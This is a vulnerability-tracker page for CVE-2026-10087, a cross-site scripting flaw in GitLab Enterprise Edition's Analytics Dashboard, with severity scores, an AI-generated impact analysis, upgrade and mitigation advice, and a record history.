Description
GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to execute arbitrary client-side code on behalf of a targeted user due to improper input sanitization in the Analytics Dashboard.
Published: 2026-06-11
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

GitLab exposed all Enterprise Edition releases prior to 18.10.8, 18.11.5, and 19.0.2 to an improper input sanitization flaw in the Analytics Dashboard. An authenticated user with developer‑level permissions could inject malicious script that would run in the browser of any user viewed the affected dashboard. This vulnerability is a classic Cross‑Site Scripting (CWE‑79) flaw that could allow an attacker to hijack user sessions, steal credentials, or execute additional client‑side attacks within the context of the targeted user’s account.

Affected Systems

The affected products are GitLab Enterprise Edition running any version from 17.1 up to, but not including, 18.10.8, 18.11.5, and 19.0.2. All other software components of GitLab are not directly impacted by the flaw.

Risk and Exploitability

The CVSS score of 8.7 classifies this issue as high severity, and the lack of an EPSS score indicates no public data on exploitation frequency, but the KEV catalog does not list it as a known exploited vulnerability. The most likely attack vector is that a malicious developer could craft a dashboard entry that includes script tags; when a target user opens the dashboard, the code executes in the target’s browser. The exploitation requires the attacker to have developer permissions and the target to view the corrupted dashboard, so the risk is significant in environments that grant widespread developer access.

Generated by OpenCVE AI on June 11, 2026 at 12:25 UTC.

Remediation

Vendor Solution

Upgrade to versions 18.10.8, 18.11.5, 19.0.2 or above.

OpenCVE Recommended Actions

  • Upgrade installed GitLab versions to at least 18.10.8, 18.11.5, or 19.0.2.
  • Limit the use of developer‑role permissions to only those users who truly require access, or remove this role where it is not needed.
  • Disable or restrict the Analytics Dashboard feature for users who are not administrators until the patch is applied.

Generated by OpenCVE AI on June 11, 2026 at 12:25 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 11 Jun 2026 13:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 11 Jun 2026 11:30:00 +0000

Type Values Removed Values Added
Description GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to execute arbitrary client-side code on behalf of a targeted user due to improper input sanitization in the Analytics Dashboard.
Title Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLab
First Time appeared Gitlab
Gitlab gitlab
Weaknesses CWE-79
CPEs cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
Vendors & Products Gitlab
Gitlab gitlab
References
Metrics cvssV3_1

{'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}

Subscriptions

Gitlab Gitlab
cve-icon MITRE

Status: PUBLISHED

Assigner: GitLab

Published:

Updated: 2026-06-11T12:39:51.628Z

Reserved: 2026-05-29T12:04:44.827Z

Link: CVE-2026-10087

cve-icon Vulnrichment

Updated: 2026-06-11T12:39:45.453Z

cve-icon NVD

Status : Received

Published: 2026-06-11T12:16:30.820

Modified: 2026-06-11T12:16:30.820

Link: CVE-2026-10087

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-11T12:30:14Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')